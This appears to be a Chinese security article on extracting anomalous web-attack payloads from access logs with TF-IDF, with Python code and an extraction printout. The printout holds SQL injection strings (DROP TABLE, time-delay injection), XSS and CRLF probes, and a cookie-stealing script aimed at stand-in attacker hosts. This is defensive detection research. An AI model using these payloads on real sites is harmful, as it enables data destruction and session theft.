自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

討論 | 自動(dòng)化Web滲透Payload提取技術(shù)

安全 應(yīng)用安全 自動(dòng)化
Web安全是一個(gè)日新月異的朝陽領(lǐng)域,每天的互聯(lián)網(wǎng)上都在發(fā)生著從未暴露的0 Day和N Day攻擊。這時(shí)一個(gè)大家都意識到的重要問題就浮出水面了:如何能從海量Web訪問日志中把那一小撮異常請求撈出來,供安全人員分析或進(jìn)行自動(dòng)化實(shí)時(shí)阻斷和報(bào)警?

一、寫在前面

做Web安全已經(jīng)三四年了,從最初的小白到今天的初探門路,小鮮肉已經(jīng)熬成了油膩大叔。Web安全是一個(gè)日新月異的朝陽領(lǐng)域,每天的互聯(lián)網(wǎng)上都在發(fā)生著從未暴露的0 Day和N Day攻擊。這時(shí)一個(gè)大家都意識到的重要問題就浮出水面了:如何能從海量Web訪問日志中把那一小撮異常請求撈出來,供安全人員分析或進(jìn)行自動(dòng)化實(shí)時(shí)阻斷和報(bào)警?

[[245313]]

對于這個(gè)問題,傳統(tǒng)的方法是利用傳統(tǒng)的WAF(無機(jī)器學(xué)習(xí)引擎),進(jìn)行規(guī)則匹配。傳統(tǒng)WAF有其存在的意義,但也有其掣肘。首先,安全從業(yè)人員都懂,基于黑名單的防御往往存在各種被繞過的風(fēng)險(xiǎn),看看安全論壇里各式花樣打狗(安全狗)秘籍就可見一斑。其次,傳統(tǒng)WAF只能發(fā)現(xiàn)已知的安全攻擊行為或類型,對于新出現(xiàn)的攻擊存在更新延遲,維護(hù)上也有比較大的成本。我認(rèn)為這些問題都源于一個(gè)現(xiàn)實(shí)——傳統(tǒng)WAF不能對其保護(hù)的網(wǎng)站進(jìn)行建模,因此只能基于已知規(guī)則,對各式各樣的Web系統(tǒng)進(jìn)行統(tǒng)一的無差別的保護(hù)。

近年來,機(jī)器學(xué)習(xí)(包括深度學(xué)習(xí))高調(diào)闖入人們的視野,也逐步應(yīng)用在了信息安全領(lǐng)域?;跈C(jī)器學(xué)習(xí)的WAF相關(guān)論文和文章也看了一些,似乎大家都主要應(yīng)用了有監(jiān)督機(jī)器學(xué)習(xí),也都提到了一個(gè)問題:有標(biāo)記的攻擊數(shù)據(jù)集(黑樣本)難于大量獲取。而一小波提出無監(jiān)督異常檢測思路的文章,又會(huì)遇到精確度低的問題。

針對這些問題,我決定先進(jìn)行一些分解。既然直接預(yù)測整個(gè)請求是否是攻擊很難做到可接受的準(zhǔn)確率,不妨就先把異常的攻擊Payload找出來。找出來后,就可以用來進(jìn)行精準(zhǔn)的攻擊分析,還可以幫助優(yōu)化WAF規(guī)則等。本文所述的技術(shù)最大的優(yōu)勢是無監(jiān)督,無需先驗(yàn)規(guī)則即可自動(dòng)提取異常Payload。

項(xiàng)目GitHub: https://github.com/zhanghaoyil/Hawk-I (不斷完善中,歡迎貢獻(xiàn)代碼)

二、思路

要把異常參數(shù)找出來,最顯而易見要解決的問題就是如何量化請求中各參數(shù)的異常程度。為了最大化利用日志中蘊(yùn)含的需要保護(hù)的Web系統(tǒng)自身的結(jié)構(gòu)信息,我決定對請求按訪問路徑進(jìn)行拆解,即分析參數(shù)value在同路徑同參數(shù)Key的其他參數(shù)值中的異常程度。

具體算法步驟是:

1) 基于TF-IDF對不同路徑下的樣本分別進(jìn)行特征向量化,按參數(shù)維度對特征向量進(jìn)行匯聚。

2) 基于特征向量提取出樣本參數(shù)在同路徑同參數(shù)Key的其他參數(shù)值中異常分?jǐn)?shù)AS(Anomaly Score)。

3) 設(shè)置閾值T,取出AS大于T的異常參數(shù)值作為輸出。

三、數(shù)據(jù)集及預(yù)處理

本文使用HTTP CSIC 2010數(shù)據(jù)集。該數(shù)據(jù)集由西班牙最高科研理事會(huì)CSIC在論文Application of the Generic Feature Selection Measure in Detection of Web Attacks中作為附件給出的,是一個(gè)電子商務(wù)網(wǎng)站的訪問日志,包含36000個(gè)正常請求和25000多個(gè)攻擊請求。異常請求樣本中包含SQL注入、文件遍歷、CRLF注入、XSS、SSI等攻擊樣本。數(shù)據(jù)集下載鏈接:

http://www.isi.csic.es/dataset/ 。在本項(xiàng)目Github中也準(zhǔn)備好了。

HTTP CSIC 2010數(shù)據(jù)集單個(gè)樣本為如下格式:

  1. POST http://localhost:8080/tienda1/publico/anadir.jsp HTTP/1.1 
  2. User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko) 
  3. Pragma: no-cache 
  4. Cache-control: no-cache 
  5. Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5 
  6. Accept-Encoding: x-gzip, x-deflate, gzip, deflate 
  7. Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 
  8. Accept-Language: en 
  9. Host: localhost:8080 
  10. Cookie: JSESSIONID=933185092E0B668B90676E0A2B0767AF 
  11. Content-Type: application/x-www-form-urlencoded 
  12. Connection: close 
  13. Content-Length: 68 
  14.  
  15. id=3&nombre=Vino+Rioja&precio=100&cantidad=55&B1=A%F1adir+al+carrito 

根據(jù)觀察,該數(shù)據(jù)集除路徑(URI)和參數(shù)外其他Header無任何攻擊Payload,具有很多冗余信息。因此對該數(shù)據(jù)集進(jìn)行格式化,只保留HTTP方法、路徑和參數(shù),轉(zhuǎn)為JSON格式方便后面使用。具體進(jìn)行了如下預(yù)處理,具體代碼見data/parse.py:

1) 去除冗余信息。

2) 執(zhí)行迭代的urldecode。

3) 生成標(biāo)準(zhǔn)化的參數(shù),將大小寫字母、數(shù)字分別轉(zhuǎn)換為a和n。同時(shí)保留原始參數(shù)和標(biāo)準(zhǔn)化的參數(shù),用于最終的Payload提取。

  1. def normalize(self, s, with_sub=True): 
  2.        #urldecode 
  3.        while True: 
  4.            new_s = parse.unquote(s, encoding='ascii'errors='ignore'
  5.            if new_s == s: 
  6.                break 
  7.            else: 
  8.                s = new_s 
  9.        #normalize 
  10.        if withsub: 
  11.            s = re.sub('\ufffd', 'a', s) 
  12.            s = re.sub('[a-zA-Z]', 'a', s) 
  13.            s = re.sub('\d', 'n', s) 
  14.            s = re.sub('a+', 'a+', s) 
  15.            s = re.sub('n+', 'n+', s) 
  16.            s = re.sub(' ', '', s) 
  17.        return s 

四、實(shí)現(xiàn)

根據(jù)算法步驟,項(xiàng)目主要分為向量化和參數(shù)異常評估和異常Payload提取兩部分。

1. 向量化和參數(shù)異常分?jǐn)?shù)

一個(gè)Web訪問記錄的成分是比較固定的,每個(gè)部分(方法、路徑、參數(shù)、HTTP頭、Cookie等)都有比較好的結(jié)構(gòu)化特點(diǎn)。因此可以把Web攻擊識別任務(wù)抽象為文本分類任務(wù),而且這種思路應(yīng)用在了安全領(lǐng)域,如有監(jiān)督的攻擊識別[1]、 XSS識別[2] 等。文本分類任務(wù)中常用的向量化手段有詞袋模型(Bag of Word,BOW)、TF-IDF模型、詞向量化(word2vec)等,兜哥的文章[3]已經(jīng)做了詳細(xì)的講解。

經(jīng)過對Web日志特點(diǎn)的分析,本文認(rèn)為使用TF-IDF來對樣本進(jìn)行向量化效果更好。一是經(jīng)過標(biāo)準(zhǔn)化后請求參數(shù)的值仍會(huì)有非常多的可能性,這種情況下詞袋模型生成的特征向量長度會(huì)非常大,而且沒法收縮;二是每個(gè)請求中參數(shù)個(gè)數(shù)有大有小,絕大多數(shù)不超過10個(gè),這個(gè)時(shí)候詞向量能表達(dá)的信息非常有限,并不能反映出參數(shù)value的異常性;三是TF-IDF可以表達(dá)出不同請求同一參數(shù)的值是否更有特異性,尤其是IDF項(xiàng)。

舉個(gè)例子, http://ip.taobao.com/ipSearch.html?ipAddr=8.8.8.8 是一個(gè)查詢IP詳細(xì)信息的頁面(真實(shí)存在),在某一段時(shí)間內(nèi)收到了10000個(gè)請求,其中9990個(gè)請求中ipAddr參數(shù)值是符合xx.xx.xx.xx這個(gè)IP的格式的,通過0×2中提到的標(biāo)準(zhǔn)化之后,也就是9990個(gè)請求的ipAddr參數(shù)為n+.n+.n+.n+ (當(dāng)然這里做了簡化,數(shù)字不一定為多位)。此外有10個(gè)請求的ipAddr是形如alert('XSS')、'or '1' = '1之類的不同的攻擊Payload。

經(jīng)過TF-IDF向量化后,那9900個(gè)請求ipAddr=n+.n+.n+.n+這一項(xiàng)的TF-IDF值:

  1. TF-IDF normal = TF * IDF = 1 * log(10000/(9990+1)) = 0.001 

而出現(xiàn)ipAddr=alert('XSS')的請求的TF-IDF值:

  1. TF-IDF abnormal = TF * IDF = 1 * log(10000/(1+1)) = 8.517 

可以看出異常請求參數(shù)value的TF-IDF是遠(yuǎn)大于正常請求的,因此TF-IDF可以很好地反映出參數(shù)value的異常程度。

熟悉TF-IDF的同學(xué)一定有疑問了,你這TF-IDF的字典也會(huì)很大呀,如果樣本量很大而且有各式各樣的參數(shù)value,你的特征向量豈不是稀疏得不行了?對于這個(gè)問題,我有一個(gè)解決方案,也就是將所有的TF-IDF進(jìn)一步加以處理,對參數(shù)key相同的TF-IDF項(xiàng)進(jìn)行求和。設(shè)參數(shù)key集合為K={k1, k2, …, kn},TF-IDF字典為集合x={x1, x2, …, xm}。則每個(gè)參數(shù)key的特征值為:

  1. vn = ∑TF-IDFxn   xn∈{x | x startswith ‘kn=’} 

具體代碼在vectorize/vectorizer.py中:

  1. for path, strs in path_buckets.items(): 
  2.         if not strs: 
  3.             continue 
  4.         vectorizer = TfidfVectorizer(analyzer='word'token_pattern=r"(?u)\b\S\S+\b"
  5.         try: 
  6.             tfidf = vectorizer.fit_transform(strs) 
  7.             #putting same key's indices together 
  8.             paramindex = {} 
  9.             for kv, index in vectorizer.vocabulary.items(): 
  10.                 k = kv.split('=')[0] 
  11.                 if k in param_index.keys(): 
  12.                     param_index[k].append(index) 
  13.                 else: 
  14.                     param_index[k] = [index] 
  15.             #shrinking tfidf vectors 
  16.             tfidf_vectors = [] 
  17.             for vector in tfidf.toarray(): 
  18.                 v = [] 
  19.                 for param, index in param_index.items(): 
  20.                     v.append(np.sum(vector[index])) 
  21.                 tfidf_vectors.append(v) 
  22.             #other features 
  23.             other_vectors = [] 
  24.             for str in strs: 
  25.                 ov = [] 
  26.                 kvs = str.split(' ')[:-1] 
  27.                 lengths = np.array(list(map(lambda x: len(x), kvs))) 
  28.                 #param count 
  29.                 ov.append(len(kvs)) 
  30.                 #mean kv length 
  31.                 ov.append(np.mean(lengths)) 
  32.                 #max kv length 
  33.                 ov.append(np.max(lengths)) 
  34.                 #min kv length 
  35.                 ov.append(np.min(lengths)) 
  36.                 #kv length std 
  37.                 ov.append(np.std(lengths)) 
  38.                 other_vectors.append(ov) 
  39.             tfidf_vectors = np.array(tfidf_vectors) 
  40.             other_vectors = np.array(other_vectors) 
  41.             vectors = np.concatenate((tfidf_vectors, other_vectors), axis=1

這些特征向量能否充分反映樣本的異常性呢?我使用未調(diào)參的隨機(jī)森林模型進(jìn)行驗(yàn)證,得到了大于95%準(zhǔn)確率的結(jié)果,比較滿意。下圖是模型學(xué)習(xí)曲線,可以看出仍處于欠訓(xùn)練的狀態(tài),如果樣本量更充足的話將會(huì)得到更好的效果。

由于本文所述方法旨在使用無監(jiān)督學(xué)習(xí)提取異常參數(shù),并不用糾結(jié)于有監(jiān)督分類的結(jié)果,只要驗(yàn)證了提取的特征的確可以反映出參數(shù)的異常性即可。

2. 異常參數(shù)值提取

得到參數(shù)值的異常分?jǐn)?shù)下面的工作就簡單多了,主要就是:

  • 數(shù)據(jù)的標(biāo)準(zhǔn)化(Standardization)
  • 根據(jù)閾值確定異常參數(shù)
  • 根據(jù)異常分?jǐn)?shù)在訓(xùn)練集矩陣的位置提取對應(yīng)的參數(shù)值

這部分沒有什么特別的邏輯,直接看代碼吧:

  1. if name == 'main': 
  2.     x = np.load(f"../vectorize/paths/~tienda1~publico~registro.jsp_x.npy") 
  3.     params = np.load(f"../vectorize/paths/~tienda1~publico~registro.jsp_params.npy") 
  4.     with open(f"../vectorize/paths/~tienda1~publico~registro.jsp_samples.json", 'r') as sf: 
  5.         samples = json.loads(sf.readline()) 
  6.     #Standardization 
  7.     ases = StandardScaler().fit_transform(x[:, :len(params)]) 
  8.     indices = ases > 6 
  9.     #extract anomalous payload 
  10.     for s in range(indices.shape[0]): 
  11.         for p in range(indices.shape[1]): 
  12.             if indices[s, p] and params[p] in samples[s]['OriParams'].keys() and samples[s]['OriParams'][params[p]].strip(): 
  13.                 print(f"##{params[p]}## ##{samples[s]['OriParams'][params[p]]}##") 

提取結(jié)果:

  1. ##modo## ##registroalert("Paros");## 
  2. ##modo## ##registroalert("Paros");## 
  3. ##ntc## ##|## 
  4. ##ntc## ##|## 
  5. ##modo## #### 
  6. ##modo## #### 
  7. ##modo## ##registro' AND '1'='1## 
  8. ##modo## ##registro' AND '1'='1## 
  9. ##ntc## ##9851892046707743alert("Paros");## 
  10. ##ntc## ##9851892046707743alert("Paros");## 
  11. ##ntc## ##5024784015351535alert("Paros");## 
  12. ##ntc## ##5024784015351535alert("Paros");## 
  13. ##ntc## ##878731290934670A## 
  14. ##ntc## ##878731290934670A## 
  15. ##nombre## ##Remi'g/*io## 
  16. ##nombre## ##Remi'g/*io## 
  17. ##cp## ##1642A## 
  18. ##cp## ##1642A## 
  19. ##cp## ##any? 
  20. Set-cookie:+Tamper=1041264011025374727## 
  21. ##cp## ##any? 
  22. Set-cookie:+Tamper=1041264011025374727## 
  23. ##dni## ##'; DROP TABLE usuarios; SELECT * FROM datos WHERE nombre LIKE '%## 
  24. ##dni## ##'; DROP TABLE usuarios; SELECT * FROM datos WHERE nombre LIKE '%## 
  25. ##modo## ##registro@40## 
  26. ##modo## ##registro@40## 
  27. ##ntc## ##841140437746594A## 
  28. ##ntc## ##841140437746594A## 
  29. ##cp## ##31227Set-cookie:+Tamper=1041264011025374727## 
  30. ##cp## ##31227Set-cookie:+Tamper=1041264011025374727## 
  31. ##ntc## ##|## 
  32. ##ntc## ##|## 
  33. ##cp## ##paros"+style="background:url(javascript:alert('Paros'))&id=2## 
  34. ##cp## ##paros"+style="background:url(javascript:alert('Paros'))&id=2## 
  35. ##modo## ##|## 
  36. ##modo## ##|## 
  37. ##cp## ##4377A## 
  38. ##cp## ##4377A## 
  39. ##modo## ##+## 
  40. ##modo## ##+## 
  41. ##modo## ##' DELETE FROM USERS## 
  42. ##modo## ##' DELETE FROM USERS## 
  43. ##dni## #### 
  44. ##dni## #### 
  45. ##cp## #### 
  46. ##cp## #### 
  47. ##ntc## ##9812245040414546','0','0','0','0');waitfor delay '0:0:15';--## 
  48. ##ntc## ##9812245040414546','0','0','0','0');waitfor delay '0:0:15';--## 
  49. ##dni## ##684739141## 
  50. ##dni## ##684739141## 
  51. ##modo## ##registro' DELETE FROM USERS## 
  52. ##modo## ##registro' DELETE FROM USERS## 
  53. ##nombre## ##*Aitan/a## 
  54. ##nombre## ##*Aitan/a## 
  55. ##ntc## ##6995607131571243## 
  56. ##ntc## ##6995607131571243## 
  57. ##modo## ##registroalert("Paros");## 
  58. ##modo## ##registroalert("Paros");## 
  59. ##modo## ##','0','0','0');waitfor delay '0:0:15';--## 
  60. ##modo## ##','0','0','0');waitfor delay '0:0:15';--## 
  61. ##modo## ##registro';waitfor delay '0:0:15';--## 
  62. ##modo## ##registro';waitfor delay '0:0:15';--## 
  63. ##modo## #### 
  64. ##modo## #### 
  65. ##modo## ##registro"><## 
  66. ##modo## ##registro"><## 
  67. ##modo## ##'OR'a='a## 
  68. ##modo## ##'OR'a='a## 
  69. ##cp## ##any 
  70. Set-cookie:+Tamper=5765205567234876235## 
  71. ##cp## ##any 
  72. Set-cookie:+Tamper=5765205567234876235## 
  73. ##dni## ##66367222D'; DROP TABLE usuarios; SELECT * FROM datos WHERE nombre LIKE '%## 
  74. ##dni## ##66367222D'; DROP TABLE usuarios; SELECT * FROM datos WHERE nombre LIKE '%## 
  75. ##ntc## ##@40## 
  76. ##ntc## ##@40## 
  77. ##cp## ##AND 11=1## 
  78. ##cp## ##AND 11=1## 
  79. ##modo## ##registroAND 11=1## 
  80. ##modo## ##registroAND 11=1## 
  81. ##modo## ##+## 
  82. ##modo## ##+## 
  83. ##modo## ##registrobob@alert(Paros).parosproxy.org## 
  84. ##modo## ##registrobob@alert(Paros).parosproxy.org## 
  85. ##cp## ##any? 
  86. Set-cookie:+Tamper=5765205567234876235## 
  87. ##cp## ##any? 
  88. Set-cookie:+Tamper=5765205567234876235## 
  89. ##dni## ##paros"+style="background:url(javascript:alert('Paros'))&id=2## 
  90. ##dni## ##paros"+style="background:url(javascript:alert('Paros'))&id=2## 
  91. ##cp## ##44349','0');waitfor delay '0:0:15';--## 
  92. ##cp## ##44349','0');waitfor delay '0:0:15';--## 
  93. ##cp## ##sessionid=12312312username=document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie## 
  94. ##cp## ##sessionid=12312312username=document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie## 
  95. ##ntc## ##219312393915667A## 
  96. ##ntc## ##219312393915667A## 
  97. ##ntc## ##928497527479202A## 
  98. ##ntc## ##928497527479202A## 
  99. ##ntc## ##848868523325038A## 
  100. ##ntc## ##848868523325038A## 
  101. ##ntc## ##AND 11=1## 
  102. ##ntc## ##AND 11=1## 
  103. ##ntc## ## ## 
  104. ##ntc## ## ## 
  105. ##dni## ##B071B890B48F## 
  106. ##dni## ##B071B890B48F## 
  107. ##modo## ##registro## 
  108. ##modo## ##registro## 
  109. ##cp## ##26130any 
  110. Set-cookie:+Tamper=5765205567234876235## 
  111. ##cp## ##26130any 
  112. Set-cookie:+Tamper=5765205567234876235## 
  113. ##ntc## ##' AND '1'='1## 
  114. ##ntc## ##' AND '1'='1## 
  115. ##modo## ##registro ## 
  116. ##modo## ##registro ## 
  117. ##ntc## ##+## 
  118. ##ntc## ##+## 
  119. ##ntc## ##706790437347227A## 
  120. ##ntc## ##706790437347227A## 
  121. ##cp## ##+## 
  122. ##cp## ##+## 
  123. ##dni## ##';waitfor delay '0:0:15';--## 
  124. ##dni## ##';waitfor delay '0:0:15';--## 
  125. ##cp## ##44721bob@alert(Paros).parosproxy.org## 
  126. ##cp## ##44721bob@alert(Paros).parosproxy.org## 
  127. ##cp## #### 
  128. ##cp## #### 
  129. ##ntc## ##424959116693048A## 
  130. ##ntc## ##424959116693048A## 
  131. ##cp## ##bob@alert(Paros).parosproxy.org## 
  132. ##cp## ##bob@alert(Paros).parosproxy.org## 
  133. ##cp## ##31495bob@alert(Paros).parosproxy.org## 
  134. ##cp## ##31495bob@alert(Paros).parosproxy.org## 
  135. ##ntc## ##899062190611389A## 
  136. ##ntc## ##899062190611389A## 
  137. ##ntc## ##0602317509119469## 
  138. ##ntc## ##0602317509119469## 
  139. ##modo## ##','0');waitfor delay '0:0:15';--## 
  140. ##modo## ##','0');waitfor delay '0:0:15';--## 
  141. ##dni## ##' AND '1'='1## 
  142. ##dni## ##' AND '1'='1## 
  143. ##modo## ##registro','0','0','0','0');waitfor delay '0:0:15';--## 
  144. ##modo## ##registro','0','0','0','0');waitfor delay '0:0:15';--## 
  145. ##dni## ##64105812Mparos"+style="background:url(javascript:alert('Paros'))&id=2## 
  146. ##dni## ##64105812Mparos"+style="background:url(javascript:alert('Paros'))&id=2## 
  147. ##modo## ##sessionid=12312312username=document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie## 
  148. ##modo## ##sessionid=12312312username=document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie## 
  149. ##cp## ##22314','0','0');waitfor delay '0:0:15';--## 
  150. ##cp## ##22314','0','0');waitfor delay '0:0:15';--## 
  151. ##modo## ##sessionid=12312312username=document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie?## 
  152. ##modo## ##sessionid=12312312username=document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie?## 
  153. ##modo## ##registro@40## 
  154. ##modo## ##registro@40## 
  155. ##dni## ##35507034W" AND "1"="1## 
  156. ##dni## ##35507034W" AND "1"="1## 
  157. ##modo## ##registroSet-cookie:+Tamper=1041264011025374727## 
  158. ##modo## ##registroSet-cookie:+Tamper=1041264011025374727## 
  159. ##cp## ##','0','0','0','0');waitfor delay '0:0:15';--## 
  160. ##cp## ##','0','0','0','0');waitfor delay '0:0:15';--## 
  161. ##cp## ##08696paros" style="background:url(javascript:alert('Paros'))## 
  162. ##cp## ##08696paros" style="background:url(javascript:alert('Paros'))## 
  163. ##dni## ##paros" style="background:url(javascript:alert('Paros'))## 
  164. ##dni## ##paros" style="background:url(javascript:alert('Paros'))## 
  165. ##cp## ##0530A## 
  166. ##cp## ##0530A## 
  167. ##ntc## ##any 
  168. Set-cookie:+Tamper=5765205567234876235## 
  169. ##ntc## ##any 
  170. Set-cookie:+Tamper=5765205567234876235## 
  171. ##cp## ##0951A## 
  172. ##cp## ##0951A## 
  173. ##ntc## ##any? 
  174. Set-cookie:+Tamper=5765205567234876235## 
  175. ##ntc## ##any? 
  176. Set-cookie:+Tamper=5765205567234876235## 
  177. ##modo## ##registro"><## 
  178. ##modo## ##registro"><## 
  179. ##modo## ##registrosessionid=12312312username=document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</s cript>?## 
  180. ##modo## ##registrosessionid=12312312username=<script>document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</s cript>?## 
  181. ##cp## ##1883A## 
  182. ##cp## ##1883A## 
  183. ##ntc## ##1816581279872417'OR'a='a## 
  184. ##ntc## ##1816581279872417'OR'a='a## 
  185. ##modo## ##registrosessionid=12312312username=<script>document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie## 
  186. ##modo## ##registrosessionid=12312312username=document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie## 
  187. ##modo## ##');waitfor delay '0:0:15';--## 
  188. ##modo## ##');waitfor delay '0:0:15';--## 
  189. ##modo## ##registro'INJECTED_PARAM## 
  190. ##modo## ##registro'INJECTED_PARAM## 
  191. ##dni## ##83627503D','0','0','0');waitfor delay '0:0:15';--## 
  192. ##dni## ##83627503D','0','0','0');waitfor delay '0:0:15';--## 
  193. ##cp## ##1914A## 
  194. ##cp## ##1914A## 
  195. ##cp## ##35543' DELETE FROM USERS## 
  196. ##cp## ##35543' DELETE FROM USERS## 
  197. ##ntc## ##@40## 
  198. ##ntc## ##@40## 
  199. ##cp## ##alert("Paros");## 
  200. ##cp## ##alert("Paros");## 
  201. ##ntc## ##0358024000873525bob@alert(Paros).parosproxy.org## 
  202. ##ntc## ##0358024000873525bob@alert(Paros).parosproxy.org## 
  203. ##modo## ##|## 
  204. ##modo## ##|## 
  205. ##ntc## ##alert("Paros");## 
  206. ##ntc## ##alert("Paros");## 
  207. ##ntc## ##367411357982441A## 
  208. ##ntc## ##367411357982441A## 
  209. ##cp## ##';waitfor delay '0:0:15';--## 
  210. ##cp## ##';waitfor delay '0:0:15';--## 
  211. ##ntc## ##6031155114009786bob@alert(Paros).parosproxy.org## 
  212. ##ntc## ##6031155114009786bob@alert(Paros).parosproxy.org## 
  213. ##modo## ##|## 
  214. ##modo## ##|## 
  215. ##ntc## ##7238071991283064 ## 
  216. ##ntc## ##7238071991283064 ## 
  217. ##cp## ##0529A## 
  218. ##cp## ##0529A## 
  219. ##modo## ##'INJECTED_PARAM## 
  220. ##modo## ##'INJECTED_PARAM## 
  221. ##dni## ##+## 
  222. ##dni## ##+## 
  223. ##modo## ##registrosessionid=12312312username=document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie## 
  224. ##modo## ##registrosessionid=12312312username=document.location='http://hacker .example.com/cgi-bin/cookiesteal.cgi?'+ document.cookie## 
  225. ##dni## #### 
  226. ##dni## #### 
  227. ##modo## ##registro@40## 
  228. ##modo## ##registro@40## 
  229. ##cp## ##46715alert("Paros");## 
  230. ##cp## ##46715alert("Paros");## 
  231. ##cp## ##08786Set-cookie:+Tamper=1041264011025374727## 
  232. ##cp## ##08786Set-cookie:+Tamper=1041264011025374727## 
  233. ##modo## ##alert("Paros");## 
  234. ##modo## ##alert("Paros");## 
  235. ##modo## ##"><## 
  236. ##modo## ##"><## 
  237. ##modo## ##registrosessionid=12312312username=document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</s cript>?## 
  238. ##modo## ##registrosessionid=12312312username=<script>document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</s cript>?## 
  239. ##ntc## ##1771682809315400' AND '1'='1## 
  240. ##ntc## ##1771682809315400' AND '1'='1## 

可以看到,至此已經(jīng)把異常參數(shù)值提取出來了,包括SQL注入、XSS、命令注入、CRLF注入、文件包含等典型的攻擊Payload。

五、后續(xù)計(jì)劃

這篇文章算是我在信息安全領(lǐng)域應(yīng)用機(jī)器學(xué)習(xí)一系列嘗試的第一篇,思路不算清奇,也沒有什么特別的難點(diǎn)。但我個(gè)人喜歡先抑后揚(yáng),不管怎么樣先把成果搞出來,然后再慢慢優(yōu)化和進(jìn)步嘛。路總是一步一步走的。

后面我打算還是在Web安全這個(gè)領(lǐng)域做一些機(jī)器學(xué)習(xí)應(yīng)用嘗試。這篇文章只是靜態(tài)地提取出異常Payload,而沒有利用到關(guān)鍵的Web系統(tǒng)結(jié)構(gòu)信息,包括訪問時(shí)序的特征,訪問來源主體(IP、UID、設(shè)備指紋等)、訪問分布的特征,我將充分利用這些信息,嘗試開發(fā)一個(gè)無規(guī)則化的簡易機(jī)器學(xué)習(xí)WAF。

參考鏈接:

責(zé)任編輯:趙寧寧 來源: FreeBuf
相關(guān)推薦

2014-11-20 13:49:15

2014-11-12 09:24:00

2024-03-20 13:19:53

2020-09-30 10:38:31

Web 開發(fā)框架

2011-01-20 10:17:25

ibmdwWeb

2012-03-29 10:57:12

Web自動(dòng)化測試

2012-11-20 17:22:57

2020-08-03 15:40:57

Web自動(dòng)化工具測試

2023-11-20 22:07:51

PythonPDF

2009-11-30 17:12:57

BMC

2018-12-03 08:46:36

Web瀏覽器SeleniumPython

2017-12-17 21:58:18

2021-09-01 09:38:21

自動(dòng)化滲透測試網(wǎng)絡(luò)安全攻擊

2021-01-24 11:46:26

自動(dòng)化Web 優(yōu)化

2009-12-23 16:19:25

WPF UI自動(dòng)化技術(shù)

2014-11-21 09:17:14

2013-04-03 14:01:25

網(wǎng)絡(luò)自動(dòng)化自動(dòng)化編排技術(shù)功能解析

2011-11-18 09:11:21

Web

2018-07-13 06:46:35

數(shù)據(jù)中心自動(dòng)化微服務(wù)

2009-07-22 14:50:50

ibmdwWeb2.0Twitter
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號